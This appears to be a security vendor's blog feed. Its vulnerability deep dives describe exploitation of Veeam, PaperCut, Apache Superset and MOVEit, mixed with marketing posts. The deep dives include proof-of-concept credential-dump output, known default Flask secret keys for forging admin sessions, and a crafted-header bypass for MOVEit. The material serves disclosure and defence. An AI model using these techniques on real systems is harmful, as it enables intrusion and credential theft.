Running our POC we get the following output:

/home/dev/RiderProjects/Veeam_CVE-2023-27532/CVE-2023-27532/bin/Debug/net6.0/CVE-2023-27532 net.tcp://
UserName = dev Password = Super Secret Password 
UserName = root Password = 
UserName = root Password = 
UserName = root Password = 
UserName = root Password =


In conclusion, CVE-2023-27532 allows an unauthenticated user with access to the Veeam backup service to request cleartext credentials. We have examined the vulnerable port, reverse engineered the Veeam Backup Service, and constructed a WCF client using .NET core. We have also shown how to extract credentials from the Veeam database by invoking the CredentialsDbScopeGetAllCreds and CredentialsDbScopeFindCredentials endpoints. Finally, we have released our POC on Github, which is built on .NET core and capable of running on Linux, making it accessible to a wider audience. It is important to note that this vulnerability should be taken seriously and patches should be applied as soon as possible to ensure the security of your organization.

The post Veeam Backup and Replication CVE-2023-27532 Deep Dive appeared first on

Public University Uses NodeZero to Close Gaps, Prove Value of Cybersecurity

11 April 2023 at 15:54

One of our customers, a public university in Victoria, British Columbia, is constantly looking for ways to improve their overall cybersecurity posture – and has started using NodeZero’s autonomous pentesting capabilities to keep their students, faculty, and data safe.

Speaking with us was the University’s Senior IT Security and Risk Specialist, a role that didn’t exist until 2017. Like many organizations, the importance of cybersecurity needed a champion in-house to bring it to the top of mind.

“Before that, there wasn’t someone dedicated to security, and virtually no policies for cybersecurity at all,” he mentioned. “My role as the sole security person here touches all areas from proposing and drafting policies, to firing up the Zeek server to look at the logs, look for strange traffic, and everything in between.”

Since joining, he has been working on aligning the university’s cybersecurity policies with industry best practices in a number of areas, and instituted a handful of programs to address vulnerability management and user management.

A while back, the organization ran into a situation where there were an abundance of minor account compromises that cumulatively turned into a hassle for everyone involved. Taking the lead, the risk specialist started building out awareness training, advocating basic policies and building an expectation of some basic cyber hygiene.

“We started to reduce the number of those kinds of incidents, which also worked out well as that was right around the time we had a few minor ransomware incidents,” he said.

“But because I’d done that work with the business units (developing better awareness and preparedness), we were able to resolve those incidents quickly.” This also led to the university realizing it needed someone in that security role full time.

NodeZero as a Difference Maker

The university wanted to do some penetration testing to get confirmation that the changes they’d been implementing were working and to identify any security gaps that might remain.

“I took advantage of some pre-negotiated contracts in place by our being a public body, and asked vendors for some quotes. After my heart restarted after seeing the quotes, I just happened to get an email from the Horizon.3ai sales team and said, ‘ok let’s take a look at it’,” said the risk specialist. “I saw the ability of NodeZero to do what I needed to do at a similar cost, but also with the ability to repeat that find, fix, verify process and customize the testing the way I wanted it done.”

That flexibility and the find, fix, verify loop really drew him in during the initial test.

“That’s really what we wanted to do,” he said. “The way is set up allows for that. It shows where problems are and provides guidance on what we need to do to fix it. It has the right philosophy, as opposed to just asking: what can we break into? I can get a kid from high school to hack away at our network, but the question is, how do we fix it?’ He also found that the ability to do multiple pentests is a huge benefit.

“It was a breath of fresh air. I can repeat this!” he said. “When one network segment showed some interesting vulnerabilities, I was able to fix them and repeat the test to verify that things were much better.”

This was the difference from traditional pentesting options, where it would cost thousands of dollars and take weeks, if not months, to bring a team in to test and assess every time.

Improving Credentials Hygiene and Beyond

NodeZero was particularly helpful in addressing the common struggles associated with credentials hygiene and patching.

“We have people who felt that having a nice, long password meant nobody would ever guess it. We’re now able to show that’s not true,” said the risk specialist. Character count matters, but is ineffective when it’s reused from a previous breach or is a simple string.

NodeZero provides password analytics from the NTDS database in their domain, pinpointing exactly where their credential policy is effective. NodeZero was also able to help with vulnerabilities that were consistently getting flagged as weaknesses in scans.

“Those vulnerabilities became a pivot point – we now have proof that there’s a vulnerability, here’s what happens when it exists, now let’s fix it,” he said.

It helps minimize pushback and enabled him to offer proof to higher-ups. By reporting on vulnerabilities or other cybersecurity issues so that everyone in a leadership role is seeing it at the same time, everyone knows what needs to be fixed – which helps foster cooperation to help those improvements move forward quickly and easily.

Deciding on NodeZero

The University did look at other, traditional pentesting options as well as NodeZero before signing on.

“Typically, they were security companies that had a standing contract with our provincial government,” said the specialist. “I didn’t look at anyone doing it autonomously the way NodeZero does it. I saw the chance to spend the same money but gain more capabilities.”

Coincidentally, the opportunity for a trial run came up at the end of the fiscal year and there was some budget left which enabled him to show leadership of the value of NodeZero.

“The reports enabled my CIO to show the executive team that we’re being proactive and taking the steps our board wants us to take, and we can demonstrate we’re taking positive action to secure our environment,” he said.

The IT and Risk Specialist has been very impressed not just with NodeZero as a tool, but also by the team behind it. “I’ll tell you, the support is phenomenal,” he told us. “I can’t tell you how many times I’ve been in the middle of an op and the chat bubble pops up because someone is there and concerned that I’m having an issue. It takes customer service to the next level.”

The team’s proactive approach has made a big difference.

“I’ve come in to work in the morning and found an email from someone at letting me know they’d reviewed our ops, found a vulnerability, and let me know how to fix it,” he said.

And then there’s the overall ease of use NodeZero offers.

“Setting up an op is simple. It’s so easy an old guy like me can do it, and it not only tells me what’s broken but how to fix it,” he remarked. “It shows the attack chain, how it got in, how to fix it, and then I can use that to demonstrate to others what needs to happen. We get the attack chain, proof, and how to fix it, all in one package.”

Download PDF

The post Public University Uses NodeZero to Close Gaps, Prove Value of Cybersecurity appeared first on

Blackhat 2023 USA

By: Cassie
17 March 2023 at 20:52

Date: August 5-10, 2023
Location: Mandalay Bay, Las Vegas

Description: Now in its 26th year, Black Hat USA returns to the Mandalay Bay Convention Center in Las Vegas with a 6-day program. The two-day main conference (August 9-10) will feature more than 100 selected Briefings, dozens of open-source tool demos in Arsenal, a robust Business Hall, networking and social events, and much more.

Visit us at booth #3144

The post Blackhat 2023 USA appeared first on

PaperCut CVE-2023-27350 Deep Dive and Indicators of Compromise

24 April 2023 at 11:15


On 8 March 2023, PaperCut released new versions for their enterprise print management software, which included patches for two vulnerabilities: CVE-2023-27350 and CVE-2023-27351. The PaperCut security advisory details CVE-2023-27350 as a vulnerability that may allow an attacker to achieve remote code execution to compromise the PaperCut application server. PaperCut also details in this advisory that they became aware of it from Zero Day Initiative (ZDI). The ZDI case, ZDI-CAN-18987, details the vulnerability as an authentication bypass which leads to code execution.

On 19 April 2023, PaperCut became aware of in-the-wild exploitation of the product and published additional details including several indicators of compromise such as log file entries, known malicious domains, and YARA rules to detect observed malicious activity.

Subsequent research by Huntress also detailing this vulnerability was released on 21 April 2023 – including exploitation details and additional indicators of compromise.

In this post we’ll walk through the methodology of discovering the vulnerability given the security advisory, look at the root cause, analyze the patch, and develop an exploit proof-of-concept.

Locating the Vulnerability

Inspecting the ZDI case reveals valuable information within the Vulnerability Details:

The specific flaw exists within the SetupCompleted class. The issue results from improper access control. An attacker can leverage this vulnerability to bypass authentication and execute arbitrary code in the context of SYSTEM.

We find that the JAR that contains this SetupCompleted class is within C:\Program Files\PaperCut NG\server\lib\pcng-server-web-19.2.7.jar.

Decompiling a JAR can be done several ways, in this case we use CFR. CFR is a useful utility that can decompile Java via the command line to human-readable code that can be used as input for diff’ing tools.

java -jar cfr-0.152.jar v19.2.7/web-jar/pcng-server-web-19.2.7.jar --outputdir v19.2.7/web-jar/decompiled/

Looking at the decompiled class ./biz/papercut/pcng/web/setup/, we see that upon submitting the form it calls performLogin() for the Admin user on line 48.

The performLogin() function can be found at ./biz/papercut/pcng/web/pages/

This function is normally called throughout the software only after a user has had their password validated through a login flow. However, here in the SetupCompleted flow, the logic accidentally validates the session of the anonymous user. This type of web application vulnerability is called Session Puzzling.

Comparing the vulnerable SetupCompleted class from v19.2.7 to the patched version in v21.2.11 with Meld, we see that if setup has already been completed, visiting this page will now redirect to the “Home” page – eliminating the session puzzling logic flaw.

Confirming the authentication bypass in the GUI, we browse to the page at and click “Login”.

Developing the Exploit

Huntress`s blog details a method to obtain remote code execution by abusing the built-in “Scripting” functionality for printers. Inspecting the Device Scripting page, we see that it enables the administrator to develop hooks to customize printing across the enterprise.

The scripts are written in JavaScript and execute in the context of the PrintCut service – which runs as NT AUTHORITY\SYSTEM on Windows deployments.

Developing a script to interact with the site normally would be pretty straight forward, but the PaperCut web application uses dynamic form fields based on the last request – so it makes it slightly less straightforward.

To develop the exploit proof-of-concept, you’ll have to use sessions and individually request each page as you would through the user interface to ensure the form fields are populated properly.

Our full proof-of-concept exploit can be found on our GitHub.

Indicators of Compromise

PaperCut has been compiling indicators as observed from exploitation in-the-wild in their advisory and will be the best source of all indicators to be on the look out for. This section lists indicators that are observed when exploiting this vulnerability using our proof-of-concept.

Navigating to the native application logs in the Logs -> Application Log tab, several indicators can be observed. While most of the indicators will appear in normal use, special attention should be given to unfamiliar source IP addresses, times, and all of these events happening in quick succession.

Authentication Bypass Indicator:

User "admin" logged into the administration interface.

Settings Change Indicator (Precursor to RCE):

User "admin" updated the config key "<A>" to "<B>".

Specifically print.script.sandboxed and print-and-device.script.enabled.

Remote Code Execution Indicator:

Admin user "admin" modified the print script on printer "<printer>".

Internet Exposure

Querying Shodan for http.html:"papercut" http.html:"print"  shows approximately 1700 internet exposed PaperCut servers.

The PaperCut application is popular with the State, Local, and Education (SLED) type organizations, where just education makes up 450 of those results.

The post PaperCut CVE-2023-27350 Deep Dive and Indicators of Compromise appeared first on

CVE-2023-27524: Insecure Default Configuration in Apache Superset Leads to Remote Code Execution

25 April 2023 at 11:40

Apache Superset is an open source data visualization and exploration tool. It has over 50K stars on GitHub, and there are more than 3000 instances of it exposed to the Internet. In our research, we found that a substantial portion of these servers – at least 2000 (two-thirds of all servers) – are running with a dangerous default configuration. As a result, many of these servers are effectively open to the public. Any attacker can “log in” to these servers with administrative privileges, access and modify data connected to these servers, harvest credentials, and execute remote code. In this post, we’ll dive deep into the misconfiguration, tracked as CVE-2023-27524, and provide advice for remediation as well as indicators of compromise to look for if you’re a user of Superset.

A Default Flask Secret Key

Superset is written in Python and based on the Flask web framework. A common practice for Flask-based applications is to use cryptographically signed session cookies for user state management. When a user logs in, the web application sends a session cookie that includes a user identifier back to the end user’s browser. The web application signs the cookie with a SECRET_KEY, a value that is supposed to be randomly generated and typically stored in a local configuration file. With every web request, the browser sends the signed session cookie back to the application. The application then validates the signature on the cookie to re-authenticate the user prior to processing the request.

The security of the web application depends critically on ensuring the SECRET_KEY is actually secret. If the SECRET_KEY is exposed, an attacker with no prior privileges could generate and sign their own cookies and access the application, masquerading as a legitimate user. The off-the-shelf flask-unsign tool automates this work: “cracking” a session cookie to discover if it was signed by a weak SECRET_KEY, and then forging a fake but valid session cookie using a known SECRET_KEY.

Back in October 2021, when we first started researching Superset, we noticed that the SECRET_KEY is defaulted to the value \x02\x01thisismyscretkey\x01\x02\\e\\y\\y\\h at install time. It’s the end user’s responsibility to modify the application configuration to set the SECRET_KEY to a cryptographically secure random string. This is documented in the Superset configuration guide. But we were curious what percentage of users actually read the documentation. So, using Shodan, we did a basic search for Superset servers on the Internet. Simply requesting the Superset login page (without attempting to login) returns a session cookie that we then passed through flask-unsign to determine if it was signed with the default SECRET_KEY. To our surprise, we found that 918/1288 (> 70%) of all servers were using the default SECRET_KEY!


So what can an attacker do knowing the SECRET_KEY for a Superset application? Assuming the Superset server is not behind single sign-on (SSO), an attacker can login as an administrator by forging a session cookie with a user_id or _user_id value set to 1, using the off-the-shelf flask-unsign toolkit. “1” corresponds to the first Superset user, who is almost always an administrator. Setting the forged session cookie in the browser’s local storage and refreshing the page allows an attacker to access the application as an administrator. For Superset servers behind SSO, more work may be required to discover a valid user_id value – we have not tested this attack path.

Superset is designed to enable integrations with a variety of databases for exploring data and creating visualizations. Admin access gives attackers a lot of control over these databases and the ability to add and remove database connections. By default database connections are set up with read-only permissions but an attacker with admin access can enable writes and DML (data model language) statements. The powerful SQL Lab interface allows attackers to run arbitrary SQL statements against connected databases. Depending on database user privileges, attackers can query, modify, and delete any data in the database as well as execute remote code on the database server.

Remote Code Execution and Credential Harvesting

Administrative interfaces to web applications are often feature-rich and result in remote code execution on the application server. We found reliable paths to remote code execution across different Superset versions in a variety of configurations. Remote code execution is possible both on databases connected to Superset and the Superset server itself. We also found a host of methods for harvesting credentials. These credentials include Superset user password hashes and database credentials, both in plaintext and in a reversible format. We are not disclosing any exploit methods at this time, though we think it’ll be straightforward for interested attackers to figure it out.

More Default Flask Secret Keys

After our initial report to the Superset team back in Oct. 2021, we decided to re-check the state of Superset in Feb. 2023 to see if the situation with the default Flask key had improved.

We discovered that in January 2022 the SECRET_KEY value was rotated to a new default CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET, and a warning was added to the logs with this Git commit.


We were curious if this change translated to a change in user behavior. We repeated the Shodan experiment from October 2021, using both the original default SECRET_KEY and the new one. We also included two other SECRET_KEYs we found, one in a deployment template, thisISaSECRET_1234, and another in the documentation YOUR_OWN_RANDOM_GENERATED_SECRET_KEY.

A basic search for Superset instances produced 3390 results, of which 3176 appeared to be really Superset instances. And of these 3176 instances, we found that 2124 (~67%) were using one of the four default keys.

The usage of Superset over the last year has increased, but the usage of a default SECRET_KEY hasn’t dropped much. A large number of installs are using the new default SECRET_KEY. To get extra precise, we did a sweep of Superset instances to grab their version information, which is often visible on the landing page. From this we got a breakdown of default keys in use by version: The rotation of the SECRET_KEY and addition of the warning in the logs happened with version 1.4.1. It can be seen from version 1.4.1 onwards, a significant proportion of instances are sill running with a default key. For instance, 71% of Superset 2.0.0 instances and 55% of Superset 2.0.1 instances and 87% of the latest Docker version 0.0.0-dev instances are running with default keys.

Alarmed by the numbers, we re-confirmed the attack paths described above and raised the issue again to the Apache security team.


The Superset team made an update with the 2.1 release to not allow the server to start up if it’s configured with a default SECRET_KEY. With this update, many new users of Superset will no longer unintentionally shoot themselves in the foot.

This fix is not foolproof though as it’s still possible to run Superset with a default SECRET_KEY if it’s installed through a docker-compose file or a helm template. The docker-compose file contains a new default SECRET_KEY of TEST_NON_DEV_SECRET that we suspect some users will unwittingly run Superset with. Some configurations also set admin/admin as the default credential for the admin user.


Among the 2000+ affected users, we found a broad mix of large corporations, small companies, government agencies, and universities. We sent out good-faith notifications to a number of organizations, some of whom remediated shortly after.

If you’re a user of Superset, you can check if your server is vulnerable with this script on Github. The script uses the flask-unsign toolkit to check if the Superset session cookie is signed with one of the known default SECRET_KEYs.

If the script shows your Superset instance is vulnerable, and you have a Superset instance running on the Internet, we recommend that you fix immediately or remove it from the Internet.

Fixing the issue requires generating a SECRET_KEY securely and configuring it, following the instructions here. In addition, since sensitive information such as database passwords is also encrypted with the SECRET_KEY, that information will need to be re-encrypted with the new SECRET_KEY. The superset CLI tool automates the process of rotating secrets – see here.

We have not validated exploitation against Superset installs with single sign-on (SSO) configured. SSO may make it hard to forge session cookies if the user_ids are unpredictable GUIDs rather than auto-incrementing identifiers. At the same time, it’s possible there are other attack paths that leak user ids, or the user ids map to easily discoverable identifiers such as email addresses. We recommend remediating even if your Superset install is behind SSO.


Telling if you’ve already been compromised is not that easy because exploiting this misconfiguration allows anyone to masquerade as a legitimate user. Superset provides a detailed action log in the interface that can be used to inspect user activity. We recommend looking for unusual admin-level actions such as viewing or modifying database configuration, adding a new database,, exporting data, or unusual queries in the SQLLab query history. We also recommend looking at the application access log to check for unusual API calls such as calls to the /api/v1/database endpoint. Of course an attacker can easily cover their tracks once they fully compromise the server.

Lessons Learned

The issue of hardcoded Flask secret keys is not new. Apache Airflow, a sister project to Superset, was affected by a similar issue, filed as CVE-2020-17526, discovered by Junghan Lee of Deliveryhero. Security researcher @iangcarroll automated discovery of vulnerable Airflow instances for bug bounty and wrote up a blog post describing the process here. The authentication bypass method he describes is exactly the same as what’s described above, as both Airflow and Superset are based off the same common framework, Flask AppBuilder.

Later on @iangcarroll found a similar vulnerability in Redash, another open source data visualization tool based on Flask. This was filed as CVE-2021-41192. The approach the Superset team took to addressing this vulnerability – refusing to start the server if it’s running with a default SECRET_KEY – is the same approach the Redash team took.

It’s not often that data is available at scale to understand how security design choices impact user behavior. Checking for vulnerabilities and misconfigurations typically requires crossing ethical boundaries. In this case, we got lucky. Telling if a Superset server is misconfigured simply requires browsing to the login page and cracking the returned session cookie.

It’s commonly accepted that users don’t read documentation and applications should be designed to force users along a path where they have no choice but to be secure by default. The data we’ve gathered backs up this common wisdom. We all know that default credentials and default keys are bad, but how bad are they really? In the case of Superset, the impact of the insecure default Flask key extends to roughly 2/3 of all users. Again, users don’t read documentation. And users don’t read logs. The best approach is to take the choice away from users and require them to take deliberate actions to be purposefully insecure.


  • Oct. 11, 2021: Initial communication to Apache Security team
  • Oct. 12, 2021: Superset team says they will look into issue
  • Jan. 11, 2022: Superset team changes default SECRET_KEY and adds warning to logs with this Git commit
  • Feb. 9, 2023: Email to Apache Security team about new data related to insecure default configuration. Started notifying certain organizations.
  • Feb. 24, 2023: Superset team confirms code change will be made to address default SECRET_KEY
  • Mar. 1, 2023: Pull request merged with code change to address default SECRET_KEY
  • Apr. 5, 2023: Superset 2.1 release
  • Apr. 24, 2023: CVE disclosed
  • Apr. 25, 2023: This post


The post CVE-2023-27524: Insecure Default Configuration in Apache Superset Leads to Remote Code Execution appeared first on

SecureWorld Atlanta

1 May 2023 at 15:55

Date: May 24, 2023
Location: Cobb Galleria Centre, Atlanta, GA

Description: For more than 21 years, SecureWorld has been tackling global cybersecurity issues and sharing critical knowledge and tools needed to protect against ever-evolving threats. Through our network of industry experts, thought leaders, practitioners, and solution providers, we collaborate to produce leading-edge, relevant content.

Visit us at booth #530

The post SecureWorld Atlanta appeared first on

Financial sector should perform penetration tests on its own according to EU regulation DORA

4 May 2023 at 15:35

PressePortal 05/04/2023

In 2022, the weekly number of cyberattacks in the financial industry averaged 1,131 attacks – a 52 percent increase in one year, according to Check Point Research figures. More than two-thirds of large institutions were affected by at least one cyberattack, not including successfully prevented attacks and unreported cases…

Read the entire article here

The post Financial sector should perform penetration tests on its own according to EU regulation DORA appeared first on

CISA’s Ransomware Vulnerability Awareness Pilot: But Is It Enough?

31 May 2023 at 17:28

In early 2023, CISA launched their Ransomware Vulnerability Awareness Pilot (RVWP). It’s designed to warn critical infrastructure (CI) entities that their systems have exposed vulnerabilities that may be exploited by ransomware threat actors. The plan is to identify affected systems that may be prevalent in CI networks, then notify operators about potential risk of exploitation. The idea behind this is to enable timely mitigation measures before the damage is done in the context of ransomware attacks.

According to the RVWP website, “Once CISA identifies these affected systems, our regional cybersecurity personnel notify system owners of their security vulnerabilities, thus enabling timely mitigation before damaging intrusions occur.” However, almost any exploitable system could allow attackers to gain a foothold, and from there, ransomware is often the next likely outcome, especially if attackers are interested in nothing more than money.

Although CISA’s efforts are a step in the right direction, the real challenge comes from identifying what systems are truly vulnerable to exploitation, then evaluating the likelihood of these systems becoming targets of attackers. Just because a system may have a possible ransom-related vulnerability does not mean it’s exploitable for a host of different reasons, for example, being completely unreachable by attackers. As a result, CI entities will likely be chasing down low-level targets while high-level risks may not get adequately addressed.

Why is ransomware so prevalent?

Most successful ransomware attacks are primarily due to hidden vulnerabilities that have laid dormant within the inner bowels of a network for some time. For example, this endemic problem plaguing American cities (and organizations all over the world) won’t likely be resolved anytime soon until organizations accept the fact that yes, they are likely vulnerable to ransomware attacks.

For example, on May 4th news outlets broke the story about the city of Dallas under ransomware attack. On Friday, May 9th local news stations were still reporting:

  • Computer dispatch was still down in the Dallas 911 call center.
  • Police and firefighters were sent to calls by radio using paper and pencil for addresses.
  • Code enforcement and other non-emergency responses to 311 calls were delayed.
  • City water bill payments were impacted. Disconnections were canceled.

And as of May 17th, local new stations are still reporting that the City of Dallas Ransomware Attack Stretches into Day 15. Although technical details of how the attack progressed are not publicly available, most security savvy people suspect it was due to a vulnerable system lying in wait.

The real problem concerning ransomware is that too many people don’t really understand what causes a successful ransomware campaign. Most believe it’s some sort of extra skilled attacker but that is not always the case. At the very root of the problem is completely exploitable systems (hardware and software) going unchecked. But why is that the case?

Because they often don’t know where they’re vulnerable

Both public and commercial organizations often have no idea where those unchecked vulnerabilities lie. That’s why it’s imperative to get ahead of the game and find the vulnerabilities yourself by attacking your infrastructures the same way an attacker will. This is not a one-and-done proposition, or some periodic list of boxes that you check. You’ll never be able to manage your risk daily if you don’t know where you’re vulnerable. As a result, tools like NodeZero are readily available to perform this continuous function for you today.

The real key to shoring up security of not only CI entities, but also cities, education systems, banks, hospitals, and anything else deemed critical is to determine what is actually exploitable by scanning, testing, and simulating what threat actors would do if they obtained, then maintained a foothold in any network. Ransomware normally begins with a foothold!

This is where autonomous pentesting approaches like NodeZero can be used to simulate the actions that would likely be taken by a ransomware attacker. This involves identifying what is exploitable, what steps could be taken by attackers to move laterally and take over systems, how attackers could elevate permissions, etc., then ensuring remediation actions are performed as soon as possibly that are highlighted by the pentesting platform.

Once remediation is complete, regularly scheduled NodeZero pentests should be performed to validate remediations were successful and if new vulnerabilities are discovered. This is not a one-and-done activity. Instead, it must become second nature to all organizations as part of their ongoing governance and risk reduction programs.

Case in point’s Year in Review for 2022 report highlights a NodeZero pentest by a North Carolina-based medical clinic. The clinic found that its systems were exploitable after NodeZero conducted open-source intelligence on the company’s name, scraped potential employees from LinkedIn, then executed the password spraying technique to find a potential logon name with a common, weak, or publicly available password.

Just as an actual cyber threat actor would do, NodeZero chained other weaknesses with the successful password spray to achieve multiple critical impacts. In this case, over 1,600 credentials were captured and used to access services and infrastructure. As a result, our customer learned that NodeZero compromised one domain, almost 50 hosts, and two domain users, while discovering nearly 50 data stores to ransom. Below, you can see proof of the successful attack.

In the report, you can see additional examples of NodeZero achieving a critical impact including domain compromise, host compromise, sensitive data exposure, critical infrastructure compromise, or ransomware exposure.

To learn more about how can help you avoid ransomware attacks in your networks,

Take a Test Drive Today

The post CISA’s Ransomware Vulnerability Awareness Pilot: But Is It Enough? appeared first on and Partner to Introduce Advanced Cybersecurity into Africa

1 June 2023 at 14:19

Businesswire 06/01/2023 has joined forces with, a U.S.-based cybersecurity firm, as a fully licensed and Certified Partner to introduce advanced cybersecurity services to the African continent. This partnership aims to provide enterprises, governments, and NGOs with a comprehensive and proactive defense against cyber threats….

Read the entire article here

The post and Partner to Introduce Advanced Cybersecurity into Africa appeared first on

Clients Want Assessments to Prove Service Efficacy

5 June 2023 at 13:57

The Solution to the Growing Divide Between Providers and Clients

Gartner® recently published a report called, Emerging Tech: Grow Your Security Service Revenue with Cybersecurity Validations. We believe the report provides research from a buyer’s perspective on security services they purchase while offering guidance to MSPs and MSSPs on how to improve retention and upsell rates of the critical services they provide. So, what has Gartner discovered, and what do they recommend?

Download Report Now

From the buyers’ perspective

Since Gartner performs inquiry sessions with clients who purchase security services, they have a unique opportunity to learn what organizations are most concerned about. In the report, it highlights some of the key findings as follows:

  • “As more executives engage in the cybersecurity purchase and retention decision, security service clients are wanting more than just threat detection and response for their IT/OT/cloud environments.
  • Many security service clients express frustration in not knowing what their provider does for them, and they question the benefits of the service.
  • Security service clients lack cybersecurity resources and look to their provider for guidance on what to do to mitigate risk. They want a partner that will proactively help them improve their security maturity.”1

Also in the report, clients expressed the desire to have processes in place so that they can validate their provider’s security services are working as claimed since they struggle to confirm the results of their providers. These processes would include a way of validating that services are improving clients’ security postures, reducing their risk, and securing their critical data and operations. The discussion around validations in the report highlights several technology areas to consider like:

  • Attack Surface Management (ASM)
  • Breach and Attack Simulation (BAS)
  • Automated (Autonomous) Penetration Testing and Red Teaming

From the providers’ perspective

On the flipside, Gartner had inquiry sessions with service providers who expressed their upmost desire to help clients prevent negative outcomes from cyberattacks. However, they lack clarity on what the client’s security posture is and seldom see clients taking responsibility to improve their position. As we can see from the report, we feel there is a disconnect between those who purchase services and those that deliver them.

Why this report is important as per us

Gartner has the distinguished role of hearing from both sides of the many dilemmas in our industry. And when they do, we feel not only do they provide an analysis of what they hear, but they also bounce solutions off both sides of the jam to see what sticks. And in this case, the Gartner report provides actionable recommendations for sellers of security services.From the service provider perspective, the report provides critical insights about how to grow revenue with distinct options providers should consider, and advice on what to do from both a short-term and longer-term outlook to meet their clients’ needs. Simply put, clients want more out of their providers and are willing to invest in enhanced services. Following the guidance in the report will turn out to be a win-win for both parties involved. Those who want to learn more about the contents in the report can download it here. [link]

Why we think was mentioned in this report?

Because our autonomous pentesting solution, called NodeZero, is the AI-driven pentesting co-pilot MSPs, MSSPs, and security consultants have come to rely on to meet their clients’ growing needs for validations—and more. The reason for this is simple. NodeZero is a force multiplier that helps service providers perform comprehensive adversary emulation and autonomous penetration testing exercises. This allows providers to meet their deliverables, enhance their clients’ security, and improve revenue and retention, all while tremendously reducing the amount of time needed to do so.

“We are seeing a tremendous uptick in interest from security providers who want to up their game and expand their services to include security assessment as part of their repertoire,” says Snehal Antani, co-founder and CEO. “They tell us there are not enough skilled assessors (aka pentesters) to perform the needed services. For example, there are only about 6000 OSCP certified ethical hackers in the US alone, and fewer elsewhere. This fact leaves providers often unable to deliver and/or enhance their services to meet client demand. This is where NodeZero comes into play.”

Today, there are many security service providers, MSPs, MSSPs, and security consultants who have standardized many of their services on NodeZero, stating that it is enabling them to overcome the limited number of pentesters they can tap into today. Not only can the solution run autonomous pentesting, but more importantly, the solution helps build a baseline of where service delivery clients are upon service engagement. This way, providers can validate improvement over time and clients can rest assured risks are reduced.

For example, “NodeZero has changed the game for my team and for our customers. What took us five person-days is now less than two days, and our customers can get frequent telemetry as opposed to a periodic snapshot of risk,” said Kelly Robertson, CEO at SecureCENTRX.

NodeZero enables providers to see their clients’ networks through the eyes of an attacker. With this perspective, they can continuously identify attack paths and exploitable weaknesses that need fixed. These weaknesses span critical vulnerabilities and misconfigurations, compromised credentials, sensitive data exposure, and ineffective security controls and security policies. NodeZero’s reporting interface enables security providers and clients to easily understand attack paths, what weaknesses to prioritize for fixing, and how to fix them. This results in reducing mean-time-to-remediation (MTTR) and helps them prove their services are delivering increasing value to their clients. MSPs and MSSPs can charge clients to fix problems that NodeZero surfaces, and they and their clients can use NodeZero to conveniently verify fixes. No longer will clients be in the dark about service efficacy.

Strategic Planning Assumptions

According to the report, “The number of security service providers that provide cybersecurity validation assessments to test their service efficacy and their client’s security posture will grow from less than 10% in 2023 to up to 40% in 2025 and over 50% by 2026. Security services providers that adopt this cybersecurity validation assessment trend will see improvement of over 5% in their acquisition, retention and upsell rates.”

After reading this report, we believe service providers that want to align to these strategic planning assumptions should seriously consider onboarding NodeZero as part of their assessments to meet these strategic goals.

Download your complimentary copy of the Gartner report and learn how to expand your business today.

Download Report Now

1Gartner, Emerging Tech: Grow Your Security Service Revenue With Cybersecurity Validations, Travis Lee, 10 April 2023.

GARTNER is a registered trademark and service mark of Gartner, Inc. and/or its affiliates in the U.S. and internationally and is used herein with permission. All rights reserved.

Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.

The post Clients Want Assessments to Prove Service Efficacy appeared first on

MOVEit Transfer CVE-2023-34362 Deep Dive and Indicators of Compromise

9 June 2023 at 13:48

On May 31, 2023, Progress released a security advisory for their MOVEit Transfer application which detailed a SQL injection leading to remote code execution and urged customers to update to the latest version. The vulnerability, CVE-2023-34362, at the time of release was believed to have been exploited in-the-wild as a 0-day dating back at least 30 days.

Soon after publication, a flurry of threat intelligence by various companies was released which indicated that this vulnerability was exploited further back than initially thought – GreyNoise seeing activity 90 days prior and Kroll reporting similar activity as far back as 2021. The attacks have been attributed to the cl0p ransomware gang, which is attributed to several other recent 0-day ransomware campaigns such as PaperCut, GoAnywhere MFT, SolarWinds Serv-U, and Accellion FTA.

Figure 1. cl0p 0-day activities

Taking a Peek – Patch Diff’ing

Taking a look at the differences between the vulnerable and patched versions we find three interesting areas.

The first difference found in the function UserGetUsersWithEmailAddress() appears to update a SQL query from a concatenated string of several arguments passed in, to a safer looking SQL builder utility. This helper function is reachable from many code paths, interestingly from several unauthenticated paths via guestaccess.aspx.

Figure 2. UserGetUserWithEmailAddress() function differences

The second difference found in the function SetAllSessionVarsFromHeaders() removes the entire function and removes the only caller of that function from the machine2.aspx handler, SILMachine2, when the received Transaction is session_setvars. Unfortunately machine2.aspx requests will only be processed if coming from localhost.

Figure 3. SetAllSessionVarsFromHeaders() function removed

The last difference found in GetFileUploadInfo() adds a single statement which changes the way the uploadState is set by first checking if the State is null before using a new decryption helper DecryptBytesForDatabase.

Figure 4. GetFileUploadInfo() function differences

A Path to Exploitation

Foreword: looking at public threat intelligence about the series of endpoints being hit and the types of indicators of compromise, we aren’t entirely sure the path we’ve found is the exact same abuse of the patched functionality mixed with abuse of intended functionality. There are likely several paths to exploitation – there are many like it, but this one is ours.

Given that the description of the vulnerability was a SQL injection, the path to the apparent patch in UserGetUsersWithEmailAddress() was pursued first. While paths were discovered to reach this function from an unauthenticated point-of-view, we were unable to discover a way to have the controllable arguments passed to it without being ‘cleaned’ by XHTMLClean(), which converts the typical unsafe SQL characters to their HTML encoded counterparts.

The Path to Unclean Input

We shifted our focus to the other removed function SetAllSessionVarsFromHeaders(). We found that this function had the restriction that only localhost is allowed to route. Threat actors were observed hitting the /moveitisapi/moveitisapi.dll?action=m2 so we were hopeful that we could find a path from moveitisapi.dll to SetAllSessionVarsFromHeaders(). moveitisapi.dll is a compiled C program of which we can analyze with Ghidra. Opening it up, we find that the function at 0x180080920, dubbed action_m2, is responsible for parsing requests that contain the action=m2 request parameter. The action_m2 function takes requests, and forwards those requests on to the machine2.aspx endpoint only if the passed in header X-siLock-Transaction is equal to folder_add_by_path.

Figure 5. action_m2() function in MOVEitISAPI.dll

Unfortunately, thats not ~exactly~ how it works. The function that extracts the X-siLock-Transaction header to compare its value to folder_add_by_path has a bug. It will incorrectly extract headers that end in X-siLock-Transaction, so an attacker can trick the function to passing the request onto the machine2.aspx by providing a header such as xX-siLock-Transaction=folder_add_by_path and additionally providing the correctly formatted header with our own arbitrary transaction to be executed by the machine2.aspx endpoint.

Figure 6. Transaction bypass via crafted headers

